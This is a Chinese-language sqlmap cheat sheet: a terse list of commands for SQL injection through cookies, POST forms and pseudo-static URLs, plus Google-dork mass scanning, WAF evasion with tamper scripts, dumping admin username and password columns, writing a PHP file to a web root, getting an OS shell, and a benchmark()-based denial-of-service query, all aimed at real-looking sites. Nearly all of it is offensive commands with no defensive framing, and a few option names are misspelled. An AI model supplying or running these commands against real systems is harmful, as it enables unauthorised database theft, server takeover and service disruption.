Sqlmap用法小结

时间:2021-09-07 08:43:07

一共有七个等级
0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息。
3、同时显示注入的payload。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面。

Mysql数据库注入
is-dba        当前用户权限
dbs            所有数据库
current-db        网站当前数据库
users            所有数据库用户
current-user    当前数据库用户
passwords         当前用户有权限读取包含用户密码的表的权限时,sqlmap会现列举出用户,然后列出hash,并尝试破解

Cookie注入
1.sqlmap -u "http://www.baidu.com/show.asp" --cookie "id=12" --level 2
2.sqlmap -u "http://www.baidu.com/show.asp" --tables --cookie "id=12" --level 2
3.sqlmap -u "http://www.baidu.com/show.asp" --columns -T "admin" --cookie "id=12" --level 2
4.sqlmap -u "http://www.baidu.com/show.asp" --dump -C "admin,password" -T "admin" --cookie "id=12" --level 2

Post注入
forms              自动获取post包
r            从本地获取结果post包
//注意看清提示键y,n,默认的键为大写
forms用法:
1.sqlmap -u "http://www.acyt.org/submit.php" --forms
2.sqlmap -u "http://www.acyt.org/submit.php" --forms --dbs
3.sqlmap -u "http://www.acyt.org/submit.php" --forms --tables -D "db"
参数r用法:
1.sqlmap -r post.txt
2.sqlmap -r post.txt --dbs
3.sqlmap -r post.txt --tables -D "db"
当请求是HTTPS的时候你需要配合这个--force-ssl参数来使用,或者你可以在Host头后门加上:443

伪静态注入
例:http://www.acty.org/view/id/40.html
sqlmap -u "http://www.acty.org/view/id/40*.html" //注意*的位置

用谷歌批量扫注入
sqlmap -g "site:baidu.com inurl:php?id="

Temper插件过waf
sqlmap -u "http://www.acyt.org/news.php?id=34" --check-waf --tamper="插件" //检测是否有waf,会显示
1.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --batch --tamper="插件" //等级3以上才能检测
2.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --dbs --batch --tamper="插件"
3.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --tables -D "db" --batch --tamper="插件"
batch         要求不对目标写入   //可以不加,最好加
tamper        使用干预脚本
check        检查URL

File参数写文件
条件:
1.权限为dba权限
2.magic_quotes_gpc设置为off

file-write              从本地写入
file-dest            写入目标路径

语句:
sqlmap -u "http://www.acyt.org/news.php?id=34" --file-write=D:/1.php --file-dest=C:/input/www/test.php   //file-write是本机的文件,file-dest为网站绝对路径,注意斜杠

os参数
前提是要有dba权限,有dba权限不一定能使用
cmd            执行cmd命令(win)
shell            执行当前用户命令
sqlmap -u "http://www.acyt.org/news.php?id=34" --os-cmd="whoami"
sqlmap -u "http://www.acyt.org/news.php?id=34" --os-shell="whoami"
sqlmapDDoS攻击
sqlmap -u "http://www.acyt.org/news.php?id=34" --sql-shell
获得一个即时shell,执行
select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

注入延时
sqlmap -u "http://www.acyt.org/news.php?id=34" --delay 0.5 //延时0.5秒
sqlmap -u "http://www.acyt.org/news.php?id=34" --dbs --delay 0.5
从Burp或者WebScarab代理中获取日志
sqlmap -l burp.log
sqlmap -l burp.log --dbs

执行sql语句
参数:--sql-query,--sql-shell
sqlmap -u "http://www.acyt.org/news.php?id=34" --sql-shell "sql语句"

暴力破解列名或表明
参数:--coomon-tables , --common-columns
sqlmap -u "http://www.acyt.org/news.php?id=34" --common-tables -D "db"
字典在txt文件夹下,可自定义